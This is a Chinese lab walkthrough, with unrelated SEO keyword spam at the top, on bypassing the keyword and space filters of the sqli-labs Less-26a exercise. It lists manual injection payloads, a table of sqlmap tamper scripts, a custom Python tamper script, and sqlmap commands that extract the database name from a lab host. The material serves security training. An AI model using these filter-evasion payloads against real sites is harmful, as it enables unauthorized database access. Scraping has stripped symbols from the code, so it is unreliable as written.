苏州高端网站建设设计公司哪家好,信息流广告文案,徐州教育学会网站建设,网络推广方法修改sqlmap-Tamper脚本 文章目录 修改sqlmap-Tamper脚本1 sqlmap官网2 sql注入漏洞注入尝试3 环境#xff1a;sqli-labs/Less-26a/3.1 尝试宽字节注入: 3.2 sqlmap使用3.3准备修改sqlmap使用 4 sqlmap中-tamper工厂#xff08;输入输出#xff09;4.1 [参考文章#xff1a;…修改sqlmap-Tamper脚本 文章目录 修改sqlmap-Tamper脚本1 sqlmap官网2 sql注入漏洞注入尝试3 环境sqli-labs/Less-26a/3.1 尝试宽字节注入: 3.2 sqlmap使用3.3准备修改sqlmap使用 4 sqlmap中-tamper工厂输入输出4.1 [参考文章sqlmap,Tamper详解及使用指南](https://www.webshell.cc/7162.html)4.2 sqlmap,Tamper详解及使用指南4.3 使用root权限使用vscode4.4 选择复制Oeunion.py一个模版进行编写4.5 使用replace方法替换4.6 re.sub”搜索的内容““替换的内容”变量4.7 定义文件 sqli-label_26.py4.8 sqlmap使用参数大全 5 执行编写的脚本5.1 发现没有被替换搜索只能搜索到小写or忽略大小写匹配(?i)5.2 修改文件 sqli-label_26.py 忽略大小写5.3 执行后已经被替换没有检测出联合查询漏洞去掉指定检测手法5.4 最终重新执行5.5 发现漏洞检测点5.6 破解当前数据库名 1 sqlmap官网
https://sqlmap.org/2 sql注入漏洞注入尝试
1. --2. %23 --》代表# 3. 尝试宽字节注入4. 尝试id2 and 1 # 返回发现and消失5.使用双写id2 aANDnd 1 #发现空格过滤6.使用双写id2aANDnd1 # 发现号也被过滤掉7. 代替空格id2%20aANDnd%201 #空格被过滤使用代替16进制 --》%20,发现也被过滤8. 使用注释 id2/*--*/aANDnd/**--**/19.可以使用空格代替字符(%09, %0A, %0d, %0c, %a0) 10. id2%a0aANDnd%a01 # 测试可以使用3 环境sqli-labs/Less-26a/ 3.1 尝试宽字节注入:
例如%c0%af来欺骗应用程序。这些编码的特殊字符在某些情况下会被解析为斜杠/从而绕过应用程序的输入验证过程3.2 sqlmap使用
~\tools\sqlmappython .\sqlmap.py -u http://10.4.7.130/sqli-labs/less-26/?id1发现没有跑出来3.3准备修改sqlmap使用
find / -name *sqlmap*
/usr/share/sqlmap # 发现sqlmap在此文件中4 sqlmap中-tamper工厂输入输出
4.1 参考文章sqlmap,Tamper详解及使用指南
SQLMap是一款SQL注入神器可以通过tamper对注入payload 进行编码和变形以达到绕过某些限制的
目的。但是有些时候SQLMap自带的Tamper脚本并不是特别好用需要根据实际情况定制Tamper脚本。
sqlmap,Tamper详解及使用指南tamper
cp -R tamper tamper.bak #备份复制模版4.2 sqlmap,Tamper详解及使用指南
序号脚本名称注释10x2char将每个编码后的字符转换为等价表达2apostrophemask单引号替换为Utf8字符3apostrophenullencode替换双引号为%00%274appendnullbyte有效代码后添加%005base64encode使用base64编码6between比较符替换为between7bluecoat空格替换为随机空白字符等号替换为like8chardoubleencode双url编码9charencode将url编码10charunicodeencode使用unicode编码11charunicodeescape以指定的payload反向编码未编码的字符12commalesslimit改变limit语句的写法13commalessmid改变mid语句的写法14commentbeforeparentheses在括号前加内联注释15concat2concatws替换CONCAT为CONCAT_WS16equaltolike等号替换为like17escapequotes双引号替换为\\18greatest大于号替换为greatest19halfversionedmorekeywords在每个关键字前加注释20htmlencodehtml编码所有非字母和数字的字符21ifnull2casewhenisnull改变ifnull语句的写法22ifnull2ifisnull替换ifnull为if(isnull(A))23informationschemacomment标示符后添加注释24least替换大于号为least25lowercase全部替换为小写值26modsecurityversioned空格替换为查询版本的注释27modsecurityzeroversioned添加完整的查询版本的注释28multiplespaces添加多个空格29nonrecursivereplacement替换预定义的关键字30overlongutf8将所有字符转义为utf831overlongutf8more以指定的payload转换所有字符32percentage每个字符前添加%33plus2concat将加号替换为concat函数34plus2fnconcat将加号替换为ODBC函数{fn CONCAT()}35randomcase字符大小写随机替换36randomcomments/**/分割关键字37securesphere添加某字符串38sp_password追加sp_password字符串39space2comment空格替换为/**/40space2dash空格替换为–加随机字符41space2hash空格替换为#加随机字符42space2morecomment空格替换为/_/43space2morehash空格替换为#加随机字符及换行符44space2mssqlblank空格替换为其他空符号45space2mssqlhash空格替换为%23%0A46space2mysqlblank空格替换为其他空白符号47space2mysqldash空格替换为–%0A48space2plus空格替换为加号49space2randomblank空格替换为备选字符集中的随机字符50symboliclogicalAND和OR替换为和||51unionalltounionunion all select替换为union select52unmagicquotes宽字符绕过GPC53uppercase全部替换为大写值54varnish添加HTTP头55versionedkeywords用注释封装每个非函数的关键字56versionedmorekeywords使用注释绕过57xforwardedfor添加伪造的HTTP头
4.3 使用root权限使用vscode
cd /usr/share/code/bin/sudo ./code # 如果打不开提示加参数如下sudo ./code --no-sandbox --user-data-dir /tmp 4.4 选择复制Oeunion.py一个模版进行编写 4.5 使用replace方法替换
1.用replace方法
python
mwelcome, test
m.replace(test, )
welcome, # 打印4.6 re.sub”搜索的内容““替换的内容”变量
# 使用正则替换
m welcome,test
import re
re.sub(rtest,tiihuan,m) # 第一个搜索值。第二个替换值第三个上搜索资源或变量
wlcome,tihuan #打印内容4.7 定义文件 sqli-label_26.py
cd /usr/share/sqlmap/temper # 路径#!/usr/bin/env python
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file LICENSE for copying permission
import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):payload re.sub(r#, and 1, payload) payload re.sub(rand, aANDnd, payload) # 如果忽略大小写加?i-r(?i)andpayload re.sub(ror, oORr, payload)payload re.sub(r , %A0, payload)return payload 4.8 sqlmap使用参数大全
参考指令大全
5 执行编写的脚本
sqlmap.py --help # 查看帮助--version显示当前sqlmap的版本号-h显示帮助信息-hh显示详细的帮助信息-v VERBOSE详细级别VERBOSE为数字默认为
1. 常规执行
┌──(kalikali)-[/usr/share/sqlmap]
└─$ python sqlmap.py -u http://192.168.225.186:11088/sqli-labs/Less-26a/?id2 -v3 --tamper sqli-label_26.py 2. 加参数指定注入手法进行排错
--technique U # BEUSTQ中的U执行联合查询
┌──(kalikali)-[/usr/share/sqlmap]
└─$ python sqlmap.py -u http://192.168.225.186:11088/sqli-labs/Less-26a/?id2 -v3 --tamper sqli-label_26.py --technique U5.1 发现没有被替换搜索只能搜索到小写or忽略大小写匹配(?i) 5.2 修改文件 sqli-label_26.py 忽略大小写 payload re.sub(r#, and 1, payload)payload re.sub(r(?i)and, aANDnd, payload)payload re.sub(r(?i)or, oORr, payload)payload re.sub(r , %A0, payload)5.3 执行后已经被替换没有检测出联合查询漏洞去掉指定检测手法 5.4 最终重新执行
┌──(kalikali)-[/usr/share/sqlmap]
└─$ python sqlmap.py -u http://192.168.225.186:11088/sqli-labs/Less-26a/?id4 -v3 --tamper sqli-label_26.py 5.5 发现漏洞检测点 5.6 破解当前数据库名
┌──(kalikali)-[/usr/share/sqlmap]
└─$ python sqlmap.py -u http://192.168.225.186:11088/sqli-labs/Less-26a/?id2 -v3 --tamper sqli-label_26.py --current-db